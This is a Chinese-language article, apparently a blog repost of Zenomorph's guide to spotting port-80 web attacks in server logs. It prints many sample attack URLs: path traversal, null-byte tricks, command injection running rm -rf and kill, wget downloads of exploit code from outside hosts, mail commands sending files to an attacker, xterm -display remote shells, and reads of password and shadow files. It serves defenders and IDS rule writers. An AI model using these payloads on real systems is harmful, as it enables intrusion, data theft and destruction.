web服务攻击痕迹

web站点默认80为服务端口,关于它的各种安全问题不断的发布出来,这些
漏洞中一些甚至允许攻击者获得系统管理员的权限进入站点内部,以下是Zenomo

rph对一些80端口攻击方式的痕迹的研究,和告诉你怎样从日志记录中发现问题

  详细描述

  下面部分通过一些列子,展示对web服务器和其上的应用程序普遍的攻击,

和其留下的痕迹,这些列子仅仅是代表了主要的攻击方式,并没有列出所有的攻

击形式,这部分将详细描述每种攻击的作用,和其怎样利用这些漏洞进行攻击。

  (1)"." ".." 和 "..." 请求

  这些攻击痕迹是非常普遍的用于web应用程序和web服务器,它用于允许攻击

者或者蠕虫病毒程序改变web服务器的路径,获得访问非公开的区域。大多数的C

GI程序漏洞含有这些".."请求。
  Example:
  http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
  这个列子展示了攻击者请求mosd这个文件,如果攻击者有能力突破web服务

器根目录,那么可以获得更多的信息,并进一步的获得特权。

  (2)"%20" 请求

  %20是表示空格的16进制数值,虽然这个并不代表你能够利用什么,但是在

你浏览日志的时候会发现它,一些web服务器上运行的应用程序中这个字符可能

会被有效的执行,所以,你应该仔细的查看日志。另一方面,这个请求有时可以

帮助执行一些命令。
  Example:
  http://host/cgi-bin/lame.cgi?page=ls%20-al
  这个列子展示了攻击者执行了一个unix的命令,列出请求的整个目录的文件

,导致攻击者访问你系统中重要的文件,帮助他进一步取得特权提供条件。

  (3)"%00" 请求

  %00表示16进制的空字节,他能够用于愚弄web应用程序,并请求不同类型的

文件。
  Examples:
  http://host/cgi-bin/lame.cgi?page=index.html
  这可能是个有效的请求在这个机子上,如果攻击者注意到这个请求动作成功

,他会进一步寻找这个cgi程序的问题。
  http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
  也许这个cgi程序不接受这个请求,原因在于它要检查这个请求文件的后缀

名,如:html.shtml或者其他类型的文件。大多数的程序会告诉你所请求的文件

类型无效,这个时候它会告诉攻击者请求的文件必须是一某个字符后缀的文件类

型,这样,攻击者可以获得系统的路径,文件名,导致在你的系统获得更多的敏

感信息
  http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html
  注意这个请求,它将骗取cgi程序认为这个文件是个确定的可接受的文件类

型,一些应用程序由于愚蠢的检查有效的请求文件,这是攻击者常用的方法。
(4)"│" 请求

  这是个管道字符,在unix系统用于帮助在一个请求中同时执行多个系统命令


  Example:
  # cat access_log│ grep -i ".."
  (这个命令将显示日志中的“..“请求,常用于发现攻击者和蠕虫攻击)
  常可以看到有很多web应用程序用这个字符,这也导致IDS日志中错误的报警


  在你的程序仔细的检查中,这样是有好处的,可以降低错误的警报在入侵检

测系统中。
  下面给出一些列子:
  http://host/cgi-bin/lame.cgi?page=../../../../bin/ls
  这个请求命令执行,下面是一些变化的列子
  http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc


  这个请求在unix系统中列出/etc目录的所有文件
  http://host/cgi-bin/lame.cgi?page=cat%20access_log│grep%20-i%20"l

ame"
  这个请求cat命令的执行并且grep命令也将执行,查询出”lame"

  (5)";" 请求

  在unix系统,这个字符允许多个命令在一行执行
  Example:
  # id;uname -a
  (执行id命令后,紧跟着执行uname命令)
  一些web程序用这个字符,可能导致在你的IDS日志中失败的警告,你应该仔

细的检查你的web程序,让你的IDS警报失败的几率降低。

  (6)"<" 和 ">" 请求

  应该检查你的日志记录中这两个字符,众多的原因中,首要的一个是这个字

符表明了添加数据在文件中
  Example 1:
  # echo "your hax0red h0 h0" >> /etc/motd (请求写信息在motd这个文

件中)
  一个攻击者可以容易的用象上面的这个请求篡改你的web页面。比如著名的R

DS exploit常被攻击者用于更改web主页面。
  Example 2:
  http://host/something.php=<b>Hi%20mom%20Im%20Bold!</b>
  你会注意到这里html语言的标志,他同样用了“〈”,“〉”字符,这种攻

击不能导致攻击者对系统进行访问,它迷惑人们认为这是个合法的信息在web站

点中(导致人们在访问这个联结的时候访问到攻击者设定的地址,这种请求可能

会被转变成16进制的编码字符形式,使攻击的痕迹不那么明显)

  (7)"!"请求

  这种字符请求常用语对SS(Server Side Include) I进行攻击,如果攻击者

迷惑用户点击被攻击者设定的联结,和上面的一样。
  Example:
  http://host1/something.php=<!%20--#include%20virtual="http://host2

/fake-article.html"-->
  这个列子是攻击者可能会做的,它让一个host2站点上的文件看起来是来自

于 host1上面的(当然,需要访问者访问这个被攻击者设定的联结。这种请求可

能被转化成16进制的编码伪装,不易发现)

  同时,这种方式也可以以web站点的权限执行命令
  Example:
  <A href='http://host/something.php=
 "/bin/rm"
  这个命令可以删除文件,如果不正确的使用是非常危险的
  Examples:
  http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*│
  http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;

  "wget and tftp" 命令
  这些命令常被攻击者用来下载可能进一步获得特权的文件,wget是unix下的

命令,可能被用来下载后门程序,tftp是unix和nt下的命令,用来下载文件。一

些IIS蠕虫通过tftp来复制自身传播病毒到其他的主机
  Examples:
  http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20ht

tp://host2/Phantasmp.c│

http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Pha

ntasmp.c;

  "cat" 命令
  这个命令用来查看文件内容,常用来读重要的信息,比如配置文件,密码文

件,信用卡文件和你能够想到的文件
  Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd

http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd;

  "echo" 命令
  这个命令常用于写数据到文件中,比如“index.html”
  Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20"fc-#kiwis%20wa

s%20here"%20>>%200day.txt│

http://host/cgi-bin/bad.cgi?doh=echo%20"fc-#kiwis%20was%20here"%20>>%2

00day.txt;
 "ps" 命令
  列出当前运行的进程,告诉攻击者远程主机运行了那些软件,以便从中得到

一些安全问题的主意,获得进一步的权限
  Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux

http://host/cgi-bin/bad.cgi?doh=ps%20-aux;

  "kill and killall" 命令
  在unix系统这个命令用于杀掉进程,一个攻击者可以用这个命令来停止系统

服务和程序,同时可以擦掉攻击者的痕迹,一些exploit会产生很多的子进程
  Examples: http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200

http://host/cgi-bin/bad.cgi?doh=kill%20-9%200;

  "uname" 命令
  这个命令告诉攻击者远程机器的名字,一些时候,通过这个命令知道web站

点位于哪个isp,也许是攻击者曾今访问过的。通常uname -a来请求,这些都将

记录在日志文件中
  Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a

http://host/cgi-bin/bad.cgi?doh=uname%20-a;

  "cc, gcc, perl, python, etc..." 编译/解释命令
  攻击者通过wget或者tftp下载exploit,并用cc,gcc这样的编译程序进行编

译成可执行程序,进一步获得特权
  Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20Phantasmp.c

http://host/cgi-bin/bad.cgi?doh=gcc%20Phantasmp.c;./a.out%20-p%2031337

;
  如果你查看日志中发现有“perl” python”这些说明可能攻击者下载远程

的perl ,python脚本程序,并试图本地获得特权

  "mail" 命令
  攻击者通常用这个命令将系统的一些重要文件发到攻击者自己的信箱,也肯

能是进行邮件炸弹的攻击
  Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@fuckcn

honker.org%20<<%20/etc/motd│

http://host/cgi-bin/bad.cgi?doh=mail%20steele@jersey.whitehouse.gov%20

<</tmp/wu-2.6.1.c;

  "xterm/其他X 应用程序" 命令
  xterm 常用来获得远程机器上的shell,如果你在你的日志中发现这些符号,

可要认真分析你的系统,可能已经存在安全裂口。注意在日志中查找"%20-displ

ay%20" 这个字符,这种痕迹通常是在远程机子上启动xterm或者X应用程序
  Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../usr/X11R6/bin/xterm%20-dis

play%20192.168.22.1│

http://host/cgi-bin/bad.cgi?doh=Xeyes%20-display%20192.168.22.1;

  "chown, chmod, chgrp, chsh, etc..." 等命令
  在unix系统这些命令允许改变文件的许可权限
  chown = 允许设置文件的拥有者chmod = 允许设置文件的许可权限chgrp =

允许改变组对文件的拥有权限chsh = 允许改变用户的shell
  Examples:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod%20777%20index.ht

ml│ http://host/cgi-bin/bad.cgi?doh=chmod%20777%20index.html;

http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown%20zeno%20/etc/ma

ster.passwd│ http://host/cgi-bin/bad.cgi?doh=chsh%20/bin/sh;

http://host/cgi-bin/bad.cgi?doh=../../../../bin/chgrp%20nobody%20/etc/


shadow│

  "/etc/passwd" 文件
  这是系统的密码文件,一般是shadow过的,并且不允许看到加密的口令,不

过对攻击者来说,可以知道那些是有效的用户,以及系统的绝对路径,站点名称

等信息,由于通常被shadow过的,所以对攻击者,通常会查看/etc/shadow 文件

  "/etc/master.passwd"
  这个文件是BSD系统的密码文件,包含有加密过的密码,这个文件对root帐

号仅仅是只读的,而一些不熟练的攻击者会打开他试图读取里面的内容.,如果w

eb站点是以root权限运行的,那么对攻击者来说,就能够读取里面的内容,对系

统管理员很多问题也将接踵而来

  "/etc/shadow"
  包含有加密过的系统口令,对root帐号同样只读,和/et/master.passwd差

不多

  "/etc/motd"
  当用户登陆进unix系统中出现的信息,就在这个"Message of the Day" 文

件中 ,它提供重要的系统信息和管理员对用户的一些设置,那些是希望用户看

到的,那些不是,还含有系统的版本信息,攻击者通常查看此文件,了解是什么

系统在运行,对攻击者来说,下一步是搜索这种类型的系统的exploit,进一步

获得系统特权
 

  "/etc/hosts"
  该文件提供ip地址和网络信息,攻击者可以了解更多的系统中的网络设置

  "/usr/local/apache/conf/httpd.conf"
  这是个Apache web服务器的配置文件,攻击者可以了解诸如cgi,ssi是否可

访问等信息

  "/etc/inetd.conf"
  这是inetd服务的配置文件,攻击者可以了解远程机器上的那些服务启动,

是否用了wrapper进行访问控制,如果发现wrapper 运行着,攻击者下一步会检

查"/etc/hosts.allow" 和 "/etc/hosts.deny",文件,并可能会更改里面的一些

设置,获得特权

  ".htpasswd, .htaccess, and .htgroup"
  这些文件通常在web站点用于对用户身份进行认证,攻击者会查看这些文件

,并获得用户名和密码,密码文件.htpasswd被加密过,通过一些简单的破解程

序进行解密,使攻击者访问站点中被保护的区域(通常用户用和用户名相同的密

码,以至攻击者可以以其他帐号进行访问)

  "access_log and error_log"
  这些是apache服务器的日志记录文件,攻击者常会查看这些文件,看那些请

求被记录,那些和其他请求不同的地方
  通常,攻击者会修改这些日志文件,比如他自身的地址信息,攻击者通过80

端口突破你的系统,而你的系统又没有进行备份的工作,也没有其他记录程序记

录系统状况,这将使入侵检测工作变的很困难

  "[drive-letter]:winntrepairsam._ or [drive-letter]:winntrepairsam"
  Windows NT系统中的密码文件,如果远程命令不可以执行,通常攻击者会请

求这些文件,然后通过"l0pht crack"之类的密码破解工具进行破解,如果攻击

者试图攻击administrator的密码文件,如果成功那么远程机器将被攻击者得到

控制权

  溢出 分析

  我不会在这篇文章中说过多的关于溢出的话题,我将举列说明那些现象和痕

迹值得注意和特别关注的地方,缓冲攻击常被攻击者通过编码转换和其他途径来

达到不易发现

  下面是个简单的列子
Example: http://host/cgi-bin/helloworld?type=AAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AA
  这个列子展示了攻击者对某个应用程序发送很多的A字符,来测试程序的缓

冲溢出,缓冲溢出可以获得远程主机的命令执行权限,如果是具有setuid和属主

为root的程序,通过溢出,可以得到整个系统的访问权限,如果不是setuid之类

的程序,那么溢出仅仅是得到运行该web站点的用户权限

  这里并不能讲述所有的情况,不过你应该有定时的检查你的日志文件,如果

那一天突然发现很多的请求,而平时的请求不多,那么说明你正遭受到溢出的攻

击,当然也可能是一种新的网络蠕虫的攻击

  编码转换

  以上提及的所有攻击请求,攻击者通常知晓IDS系统常会机械的检查这些请

求,通常是攻击者会用编码转换工具将所请求的内容转化成16进制的格式,导致

IDS会忽略这些请求,我们熟知的CGI漏洞扫描工具Whisker就是个很好的列子。

如果你在查看日志的时候发现大量的16进制和不常见的一些字符,那么可能攻击

者尝试用一些方式对你的系统进行攻击。

  一种快速发现的方法是,将你的日志文件中的那些16进制的请求,拷贝到你

的浏览器中,通过浏览器可以转化成正确的请求,并显示出来请求的内容,如果

你不敢冒这个危险,简单的man ASCII,可以提供给你正确的编码。

  结论
  这篇文章不可能覆盖所有的80端口的攻击,但是以上已经列举了大部分普遍

的攻击方式,同时告诉你如何检查你的日志文件,和怎样加如一些IDS的规则,

写她的目的在于给web系统管理员应该关注什么提供一个好的思路,同时,我也

希望这篇文章可以帮助给web程序的开发者写出更好的web程序。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值